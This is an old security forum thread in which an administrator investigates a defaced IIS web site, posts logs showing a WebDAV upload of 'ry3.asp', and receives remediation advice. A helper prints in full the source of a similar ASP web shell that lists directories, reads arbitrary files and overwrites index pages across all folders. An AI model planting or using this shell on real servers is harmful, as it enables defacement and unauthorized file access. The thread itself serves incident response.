fatal error ownz you! by the danz! -->plz help

[kr4y3]

Originally posted here by mark_boyle2002
On another note. Ever noticed how these Uber l33t haxors that manage to bypass your security and deface your web page have absolutely no HTML skill att all.

I mean have you ever seen a page defaced with anything decent ?

Heheh my favorites are the ones that go:

We ownz j00!
Some shouts to b00b00, lil may may, destruktor........etc

you would think these super smart pple might have something more to say than just handing the feds a list of IRC names of their friends.

[sascha44]

the firewall we're using is a watchguard firebox III 1000 with sw version 4.61..

again, on the firewall log i've seen only entries with the allowed status on the port 80 to the attacked server, all other were denied so i think it must be a kind of exploit, but how, it isn't clear to me yet..

[jeffs72]

Interesting. I assume you are blocking syn packets also?

What sort of web site is this? Do you run asp pages that have posting capabilities? Ecommerce? I'd almost imagine this is some sort of permissions problem where a script has too much authority or some such. Any data on what the web site in question does might help there. with IIS5 I'm guessing you aren't using any cgi/perl, just straight asp and html?

[sascha44]

You might be right!

I just found this in one of the logs:

2003-12-06 17:02:53 62.2.17.117 - W3SVC73 195.65.107.213 80 GET /index.htm - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) - -
2003-12-06 17:49:18 200.222.218.109 - W3SVC73 195.65.107.213 80 GET /index.htm - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - -
2003-12-06 17:49:38 200.222.218.109 - W3SVC73 195.65.107.213 80 OPTIONS / - 200 0 Microsoft+Data+Access+Internet+Publishing+Provider+Protocol+Discovery - -
2003-12-06 17:49:38 200.222.218.109 - W3SVC73 195.65.107.213 80 PROPFIND / - 207 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:41 200.222.218.109 - W3SVC73 195.65.107.213 80 PROPFIND / - 207 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:41 200.222.218.109 - W3SVC73 195.65.107.213 80 PROPFIND / - 207 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:50 200.222.218.109 - W3SVC73 195.65.107.213 80 HEAD /ry3.asp - 404 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:51 200.222.218.109 - W3SVC73 195.65.107.213 80 PUT /ry3.asp - 201 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:56 200.222.218.109 - W3SVC73 195.65.107.213 80 GET /ry3.asp - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - -
2003-12-06 17:50:12 200.222.218.109 - W3SVC73 195.65.107.213 80 POST /ry3.asp - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDCARRCDAR=LAIACKICACHCKHNMEMFDHPMC http://<b><a rel="nofollow" href="ht...y3.asp</a></b>
2003-12-06 17:50:32 200.222.218.109 - W3SVC73 195.65.107.213 80 GET /ry3.asp - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDCARRCDAR=LAIACKICACHCKHNMEMFDHPMC -
2003-12-06 17:50:36 200.222.218.109 - W3SVC73 195.65.107.213 80 DELETE /ry3.asp - 401 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV ASPSESSIONIDCARRCDAR=LAIACKICACHCKHNMEMFDHPMC -


Now i have to take a closer look on the script permissions....

[xmaddness]

Well, it looks to me like your file permissions may have what allowed this to happen.


I looked up this ry3.asp and it appears to make use of a Server.CreateObject ("Scripting.FileSystemObject") asp exploit type code.

Taken from here.
The FileSystemObject is a component often used to access the server's file system. For example, you can create files, read the contents of a file, determine whether or not a folder or file exists, iterate through the contents of a folder, or any other number of file-system related tasks.

Now, the way asp looks at these things is weird. basically when asp calls a Server.CreateObject ("Scripting.FileSystemObject"), the anonymouse web userid is used. IE IUSR_yourservername. Now, if your file permissions are full access, using this script they have full access to your server.



Here is a similar, if not same, type script.

Code:

<%
On Error Resume Next
Set Objeto=Server.CreateObject("Scripting.FileSystemObject")
if request("t5") <> "" then
 Set ObjPasta = Objeto.GetFolder(request("t5"))
end if 
%>
<%On Error Resume Next
if request("t3") <> "" then
Set ObjPasta2 = Objeto.GetFolder(request("t3"))
set ObjFso=server.CreateObject("Scripting.FileSystemObject")
var_caminho=request("t3")
For Each Pasta in ObjPasta2.Subfolders
 Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.htm", 2, True, False)
 ObjAbreArq.writeline request("t4")
 set ObjAbreArq = nothing   
 Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.html", 2, True, False)
 ObjAbreArq.writeline request("t4")
 set ObjAbreArq = nothing   
 Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.asp", 2, True, False)
 ObjAbreArq.writeline request("t4")
 set ObjAbreArq = nothing   
 Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.htm", 2, True, False)
 ObjAbreArq.writeline request("t4")
 set ObjAbreArq = nothing   
 Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.html", 2, True, False)
 ObjAbreArq.writeline request("t4")
 set ObjAbreArq = nothing   
 Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.asp", 2, True, False)
 ObjAbreArq.writeline request("t4")
 if err then
   response.write "<font color=red><br>Erro em: </font>" & pasta.name
   err=0
 else
   response.write "<br>OK em " & pasta.name
 end if    
 set ObjAbreArq = nothing   
next
set ObjFso=nothing
Set ObjPasta2 = nothing
set ObjFso = nothing
end if
%>
<html>

<head>
<title>.</title>
</head>

<body>

<p align="center">Você está em: <%=server.mappath("ry3.asp")%> </p>

<form method="POST" action="ry3.asp">
  <p>Caminho: <input type="text" name="T3" size="44"><br>
  Texto:<input type="text" name="T4" size="73" value="#affix  ownz u - _EviL_"> <input
  type="submit" value="Iniciar" name="B1"></p>
</form>

<form method="POST" action="ry3.asp">
  <div align="center"><center><p>Prompt: <input type="text" name="T5" size="43"
  value="<%=request("t5")%>"><input type="submit" value="Dir" name="B1"></p>
  </center></div>
</form>
<div align="center"><center>

<table border="1" width="70%" bordercolor="#FF0000" cellspacing="0" cellpadding="0">
  <tr>
    <td width="50%"><p align="center">Diretórios Numerados</td>
    <td width="50%"><p align="center">Arquivos</td>
  </tr>
  <tr>
    <td width="50%" valign="top"><% On Error Resume Next
     dim contador
     contador=1
      For Each Pasta in ObjPasta.Subfolders
         Response.Write Contador & "-) "& Pasta.Name & "<br>"
         contador=contador+1
      next%>
</td>
    <td width="50%" valign="top"><%On Error Resume Next
       For Each Arquivo in ObjPasta.Files
         Response.Write Arquivo.Name & "<br>"
       Next%>
</td>
  </tr>
</table>
</center></div>

<form method="POST" action="ry3.asp">
  <div align="center"><center><p>Caminho: <input type="text" name="TT" size="39"> <input
  type="submit" value="Ver Arquivo" name="B1"></p>
  </center></div>
</form>
<%On Error Resume Next
if request("tt") <> "" then
          var_caminho=request("tt")
          set ObjFso2=server.CreateObject("Scripting.FileSystemObject")
          Set ObjAbreArq2 = ObjFso2.OpenTextFile(Var_Caminho, 1, True, False)
           Do While Not ObjAbreArq2.AtEndOfStream
              Linha = Linha & ObjAbreArq2.Readline & chr(13)
           Loop
           response.write "<TEXTAREA NAME=sujos ROWS=10 COLS=70>" & Linha & "</TEXTAREA>"
           ObjAbreArq2.Close
           Set ObjAbreArq2 = Nothing
           ObjFso2.close
           set ObjFso2 = Nothig
end if%>
</body>
<%set ObjPasta = nothing
set Objeto = nothing%>
</html>

So now the question is, was this ry3.asp script already on your box? Or was it put there?

If it was put there, it looks like it was done thru HTTP's WebDAV authoring protocols. You may want to have a look at the WebDAV rpc's to see idf you left a hole open somewhere.


Well, its just what I see, and seems to make sence to me. Go back and take a llok at your server's file permissions. This is most likly what allowd this to happen.

[ghostofanonion]

If I was going to deface a page I wouldn't put any effort into it, I mean then I'd have attatchment to it have to write my callsign or something, Graffiti, then the cops come a knockin somehow i think it's the wrong idea' to sign your handiwork in the hacking field..
ALSO note, HTML Skills versus GRAPHIC DESIGN Skills, there is quite a differance

[sascha44]

Yes i think they used this asp script i found too on the web.

on the script file permissions i saw that at the .asp extension there are POST, GET, HEAD and TRACE Permissions. Now , i am not a webmaster (he's sick at moment), do you think i can delete all except the POST and our regular asp script files should be still executable?

I'm gonna try this...

[xmaddness]

Well, it really depends on what their version of the ry3.asp file did. If it is a s'kiddie, they probably did not edit the asp in it. But if it is someone with a little bit of knowledge, they could have written in any code they wanted into your exsisting asp files. The Server.CreateObject("Scripting.FileSystemObject") has the ability to append code into files, which means they could have opened up several backdoors into your system. They quite possibly could have gotten into your databse and mucked with it also.

They deleted the ry3.asp file from the server, so there is no real way of knowing exactly what they did or did not do. What I would probably do is check the last modified dates of your servers files. Anything modified after the date of the attack is for all intensive purposes lost, and should be removed and changed over with a backup copy. If it were me, I would redo the entire box itself. Once they had control over the server, they easily could have executed commands on the server itself. Check your logs to see if any commands were executed on the box itself, as the FTP user, etc etc...

Getting hacked is no fun at all. Learn from your mistakes, and make sure to check all the file permissions in the server before going live. One of the biggest mistakes webmasters do is leave a file full access, for ease, and say to themselves "Oh I'll go back later to lock it down". It very rarely happens.



As far as how they got in in the first place? Not sure. You will have to look around your server to see if any webcode allows people to upload stuff to your server. If so, that is how they got in.

Happy hunting.

xmad

[sascha44]

I allready recovered the files to the point before this happened, all i saw until now is that they uploaded some defaced index.html, default.html, default.asp and index.asp pages (i guess with help of this RY3.asp script ..i'm going to delete all of them...

i think , i'm going to change our start pages to something else in future , because we made them easy replacing them by now...

the database-files haven't been touched, so i assume they have been just some dumb script-kiddies , but i'll be watchfull , observing carefully the next few days the logs if there are some strange things occuring ...

Thank you all for your support

kind regards

sascha

[xmaddness]

By the way, It seems you still have these files on your server. I would get rid of them as soon as possible.